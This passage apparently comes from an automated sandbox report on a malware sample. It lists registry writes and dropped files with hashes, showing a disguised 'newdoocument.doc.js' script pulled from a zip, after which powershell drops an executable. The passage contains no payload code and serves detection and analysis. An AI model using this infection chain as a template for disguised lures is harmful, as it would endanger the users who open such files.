19445760000000060CEDD02F8E81F0254E81F020200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F02
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2688
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\newdoocument.doc.zip
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2688
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\System32\wshext.dll,-4804
JScript Script File
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2688
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2288
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2288
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
4056
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
4056
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
4068
chrome.exe
delete key
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
4068
chrome.exe
delete key
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
failed_count
0
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
2
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
01000000
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
1
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
dr
1
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome
UsageStatsInSample
0
4068
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
0
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_installdate
0
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_enableddate
0
4068
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumAccounts
aggregate
sum()
4068
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumAccounts
S-1-5-21-1302019708-1500728564-335382590-1000
1
4068
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumSignedIn
aggregate
sum()
4068
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumSignedIn
S-1-5-21-1302019708-1500728564-335382590-1000
0
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
0
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
13199767465405500
4068
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
1
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
aapocclcgogkmnckokdopfmhonfmgoek
9918BED0FAE78D5CDEA300EFDA95873D71288ECBBD89E7A8D1BA62C13F923CFB
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
ahfgeienlihckogmohjhadlkjgocpleb
15B1C3FE35F29528448F36A72A4DFBC58A8083C7190559D25865779166D220A2
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
aohghmighlieiainnegkcijnfilokake
2F0189EE83786B4022489A24B2F493E9142CF5B581DDA963EAF63C99E03EA5CF
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
apdfllckaahabafndbhieahigkjlhalf
F1F12E7A16B8D3C3D3200E7C963C56D702BD6CD0B962D66A6AD3A83A6C0F6C4A
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
blpcfgokakmgnkcojhhkbfbldkacnbeo
773055A87131E0F7D93EBBC1DE482F4C3730F7B83EC5014EC8E972BB4EEF415C
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
felcaaldnbdncclmgdcncolpebgiejap
BA808044531BF1136A3AE7391908B5048A43C91EEE306C36DE3C4AD8952FADA7
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
gfdkimpbcpahaombhbimeihdjnejgicl
D6B079666F209503A09486C70AC09307652A0F7F783166A999B27C99D0DA79E2
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
ghbmnnjooekpmoecnnnilnnbdlolhkhi
3E2DD117228D83062D52B074E67BAF0A5830E57291AC4C3B1EDE849A4001DD8E
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
kmendfapggjehodndflmmgagdbamhnfd
00175B8120231631976CA8B862A3416996C9373BA3D289F0619DDA992973DDFA
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
mfehgcgbbipciphmccgaenjidiccnmng
63355C14E8C7DF9A075F2EDDEA6F2807DC8166B83F96F4C975B9B6554C6324D7
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
mhjfbmdgcfjbbpaeojofohoefgiehjai
0E265BFED6F1C7D5F0A9BD790C50BB30E78E959631D51EEBB8BB0DE73E65763C
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
neajdppkdcdipfabeoofebfddakdcjhd
04A45240BDA55E8777FA04357712CA6DD942253A21323E4C7D3CCF769B34BFED
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nkeimhogjdpnpccoofpliimaahmaaome
EFA63CBF982B82CF44E63E567FF3BB95FE3F51570D9A0CED8846E77B13199169
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nmmhkkegccagdldgiimedpiccmgmieda
4B902024351BF24989ECB9653602C79350FC33203A00E9CA3DE534ED81404974
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
pjkljhegncpnkpknbcohdijeoejaedia
09060D959E29107D2FE4E791E0CFF4D19996C144D6A0AFC0A52B230F93BCB8A9
4068
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
pkedcjkdefgpdelpbcmbmeomcjbeemfm
0EC14E33F8662DEC7454B43E35060AFF9D296071C511E3BAA14C36F484593AE6
4016
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
4068-13199767464327375
259
4016
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
4068-13199767464327375
0
3564
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3564
chrome.exe
write
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB
CrHook
84D4B60440744804

Files activity

Executable files
1
Suspicious files
62
Text files
144
Unknown types
13

Dropped files

PID
Process
Filename
Type
4056
powershell.exe
C:\Users\admin\AppData\Local\TempoZg18.exe
executable
MD5: ea4907a6ac5ae8ccbc11ca8b5726f101
SHA256: f5a5e7d86c3131b3f0a479fa55f35f8fa7c0ea7615b244752f96071156982071
2688
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DIa2688.34301\newdoocument.doc.js
text
MD5: ebbd0e1c1003a606f7767f87ca468bd0
SHA256: 43bb25b251979bbc5c818e173b2b5f9f5c1cf5da17dda785f8c4d0974aff0f75
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
text
MD5: 2ad825c93111d176a8c185334d325ec5
SHA256: 469681d50080c90327d21355310c1ea27551a417c7afd1f0b1d169f98623467b
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
binary
MD5: f50f89a0a91564d0b8a211f8921aa7de
SHA256: b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cookies
sqlite
MD5: 4d70c35c29a44065adced4d628808414
SHA256: ead40e4b81afeb8ca4448a1787c889932205cba51f98dd38ee60f83da9b96fea
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State
text
MD5: da38df75afa5e5f71bd27382f9a2401c
SHA256: 0d241cf1a6c4687c1ce2369fe2bdd2a909c80d485ce9563554cd28ead4a556f5
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: a6178b9e3e9cc0ed57ea7d2f37e6afa0
SHA256: 8eb800b09a417a8bb7dc7ec2b1bc6e38fa67d89ccbad8670da36900c4eb05139
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF13abf3.TMP
text
MD5: a6178b9e3e9cc0ed57ea7d2f37e6afa0
SHA256: 8eb800b09a417a8bb7dc7ec2b1bc6e38fa67d89ccbad8670da36900c4eb05139
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\6c784ea6-3085-48c0-ba10-3fb7db29720a.tmp
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State~RF13abe3.TMP
text
MD5: da38df75afa5e5f71bd27382f9a2401c
SHA256: 0d241cf1a6c4687c1ce2369fe2bdd2a909c80d485ce9563554cd28ead4a556f5
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: 1208602173068879fd9aa4b7280d1478
SHA256: 45b45031942e2082b8a36a5ba10d416fb2e7dd46de0644cfdaf1b3d8215f3f8c
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF13ab85.TMP
text
MD5: 1208602173068879fd9aa4b7280d1478
SHA256: 45b45031942e2082b8a36a5ba10d416fb2e7dd46de0644cfdaf1b3d8215f3f8c
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
text
MD5: 5039fdb421563825e6ed63ea21945f97
SHA256: 62586b9845cf760bcf73eeb7d1b6b600967ce956054239cbcb00f8a386aa0c27
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index~RF13ab85.TMP
binary
MD5: 246b6b00e8f842740eb185d78421c59e
SHA256: 4096efba74078bb247df2b439564ee55e22f9c16fdc3b3212f56ae31ff24cb8d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
binary
MD5: 246b6b00e8f842740eb185d78421c59e
SHA256: 4096efba74078bb247df2b439564ee55e22f9c16fdc3b3212f56ae31ff24cb8d
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\fc7916a7-3063-45c0-b7a0-bf404eced8bd.tmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences~RF13ab76.TMP
text
MD5: 5039fdb421563825e6ed63ea21945f97
SHA256: 62586b9845cf760bcf73eeb7d1b6b600967ce956054239cbcb00f8a386aa0c27
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF13ab76.TMP
text
MD5: a5d68ec0b576cd6996d5464a8ba23023
SHA256: f4c67f46aa2123d231f54742e6f1fdef429c638cc15149695e5a9fe938163f0d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF13ab66.TMP
binary
MD5: 1d4eb16a1af195cfa851961a01fee7f8
SHA256: 40f3a3040c1e0c969626d33be49c84df81ba17930b7475a19feeba327d145999
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\QuotaManager
sqlite
MD5: 90af1dbe6046f6d318eb43ccaab6038d
SHA256: f79b5e5a0acc7641a0c24fb9070473f5c4dfe5e600a685c25dddf0f3c19188e6
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\23be1dad-5899-45d1-bae2-2f8febf9efa1\index-dir\the-real-index~RF13ab56.TMP
binary
MD5: 185a9e2d88264c772dce8fe852dff1d3
SHA256: 1b846b52bae6c3b437a9aa9734493f62349466902b609519dec6a3b52be37516
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\c0bac55c-cb56-48e8-9cd9-94138746db48.tmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\a664cda4-8561-4ab9-ba0b-4316f1edd63c.tmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\15a992c2-63f5-4a79-a72e-055d5e1033a3.tmp
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1
binary
MD5: 99fbca0e314410201d158a516d94e03b
SHA256: debaf44b6f42b2a21aef4f93791f7b25ddae633c513a5aff52d4db9dfd5903b8
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0
binary
MD5: d10fe27354e46b6e44fbc1b9e6dedfbc
SHA256: 5537a78e2b19319548ec9fa8ebddbb836d655c422702ef40e298694c5e0f55d2
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2
binary
MD5: 1905f3c9e9bacaaee5b98a7ee6bf103f
SHA256: 6feb6233b0af6131f39b597bdba9c0c7756fa67025691b2b60778843c015fea2
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log
binary
MD5: ecea4a7eb3199c5b2ea54c4fcd296816
SHA256: ad3151311c1cdf89fadb108b76e641a3fc0dd348255ea5616d1ef163363a2fd5
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
binary
MD5: 1d4eb16a1af195cfa851961a01fee7f8
SHA256: 40f3a3040c1e0c969626d33be49c84df81ba17930b7475a19feeba327d145999
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Current Tabs
binary
MD5: 5339a8e3c6d4f5739a5d3800404e3759
SHA256: 11db00c7be00c60570047ee592b32ed4419eb2d175e718f4d4be091045580a45
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\23be1dad-5899-45d1-bae2-2f8febf9efa1\index-dir\the-real-index
binary
MD5: 185a9e2d88264c772dce8fe852dff1d3
SHA256: 1b846b52bae6c3b437a9aa9734493f62349466902b609519dec6a3b52be37516
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG
text
MD5: 1a79b99ba876213c01670b4326e3397d
SHA256: f0e65729d3fd5b21b9994056ef5985f098b36dbe7d77612fc7162e9c786db177
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\23be1dad-5899-45d1-bae2-2f8febf9efa1\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
text
MD5: b4ac677e4ada5d7eb68545b87f718d77
SHA256: c01a8e46bd3e0c130fb36e5d4fda9cad2dea0cfb17ff277d6d5a19605d466979
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
text
MD5: 46ac4fdc389a2b817fe9a9e15b99043b
SHA256: c4c6d737d9a5409e92d0cfdd9c766ee6c1f5766448afcf94747dc7a4188b9802
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
text
MD5: f8157129a104049e8132a721a3e4cd2b
SHA256: 9cb5fb84dae9f57128f00fbfbc2c99cafbac00b1d5850f316d366a13ad55d726
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000018
binary
MD5: dc50999a09b1e2f6e9350855136b865e
SHA256: f759b718dac41a2b27aca56179793c7063060dd8dc1bc051948866503c275b6f
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
binary
MD5: 8f5b1698cede4c8a384762539d38e850
SHA256: 5be29a0436f5cd85679db901065e87d6c07f3fb0573e6b9200240cc222b8718a
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
text
MD5: 26592cb0e3881207393552d7ffecfe39
SHA256: ce5c00199077280017bcd2a80635efa01650477415acec93f2583e2cfa185aa5
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links
binary
MD5: 46c31c683d080789f6fc26d1efe7cb4c
SHA256: d2ea0ead6db37072560936737eaa741e5587eb8d89899a39c0792797d3652b45
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log
binary
MD5: 1da542163634fd810d09c1fc149d6932
SHA256: 7425cde3afda2715b93b80292db9f2670d8a0de372b9b9b3f36656f39f3299c9
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
text
MD5: 96ab462a3a36f0a59da764b7692580cf
SHA256: 327e860b5680b2fc7eceb7324a51da80c50e1bcb3ca3608ef299fe424040e6b6
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Favicons
sqlite
MD5: 69254467d2f7eccc27e9ca3bbfdcc33c
SHA256: 4d9332105272d13760e2774c5b0ffec1a76692c8a168f072c2b2476cab0f1bd8
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
text
MD5: e18608d17424a616f952a920b027c97b
SHA256: 7f5f1eeb36a4326e8882bc76bb116f02f927bf28a6fe041fd2598f98d4150ef3
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG
text
MD5: 29cedd237befa3cfc629a696cbdf802c
SHA256: 3e4a6035858463f8f5cfd92fb477a2b887a72324263a192facfdb746bd03c5bb
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: a5d68ec0b576cd6996d5464a8ba23023
SHA256: f4c67f46aa2123d231f54742e6f1fdef429c638cc15149695e5a9fe938163f0d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
sqlite
MD5: 7e3c1d082ac38e9acb3ee1f77a1b0175
SHA256: 33e0bc91aa5158664287cad7adff0f546291ce2917235c061dea11297d43f38e
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF13ab28.TMP
text
MD5: a5d68ec0b576cd6996d5464a8ba23023
SHA256: f4c67f46aa2123d231f54742e6f1fdef429c638cc15149695e5a9fe938163f0d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor
sqlite
MD5: d5a38ff34170edfcd7b25fb782d54861
SHA256: 405ac0ee04ba36a174f79e9005e16b46d1691ad9cf05a5d951c8c18d5ce66db5
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\History
sqlite
MD5: 21b0ad354eb6c1d2d3d6b9d9b530b21d
SHA256: d862f465f71f0da66935bf2d80cbc4a7971e0ba28ffb1f41312ec1f4c8779b3f
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\History-journal
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
binary
MD5: d973e4a5354285f57b1e37addf6dd19a
SHA256: 485bcca79831607572d8c0e7dcc57ec7034b25f4aa4c474072edee8e3694f861
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Top Sites
sqlite
MD5: ce3615469d3c267d58692854cdfd2fe1
SHA256: 5d1274b58203d224625ef41c7d560835a9bd45415c60a87b0b2d1b3ca06ca794
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data
sqlite
MD5: 89c00a8e4f5230432acea5e752ed1170
SHA256: 23550ad3798aff7c3fa2b3b06f807ff63af264f257945a8525ccaa6c07ac4bfe
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\60f2f3bb-d457-4758-9399-73e2602503bc.tmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Current Session
binary
MD5: 76da4d1f7e5fc0a47864bd7472bc7673
SHA256: 13d837991a2771ba4197d9b6cae0a7f19622f45362050aff5b5771ce775243e9
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\index.txt
binary
MD5: 10bc8783b45641e8b34a957075ad129f
SHA256: 0e911a9a8c8eca3821a4bc78e7b76bfd61d9d9aad72a9ccf2f48bb54a4bb3ed9
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\index.txt~RF13a859.TMP
binary
MD5: 10bc8783b45641e8b34a957075ad129f
SHA256: 0e911a9a8c8eca3821a4bc78e7b76bfd61d9d9aad72a9ccf2f48bb54a4bb3ed9
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\index.txt.tmp
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001a
image
MD5: 34f690a0b516cc11d506c81624c1e4fe
SHA256: d2d89520925f18e2c3b80f9282e4d9a9158bed97c6fd35470357a758019c2f69
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000019
image
MD5: 8767a81ca2defe4d92211052217f6fdd
SHA256: fc6d86dbb812cdafa3bca0a6212b1a029d4b537ab3dda638b3d80fa767312ee0
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7319.128.0.1_0
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4068_12024\CRX_INSTALL
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
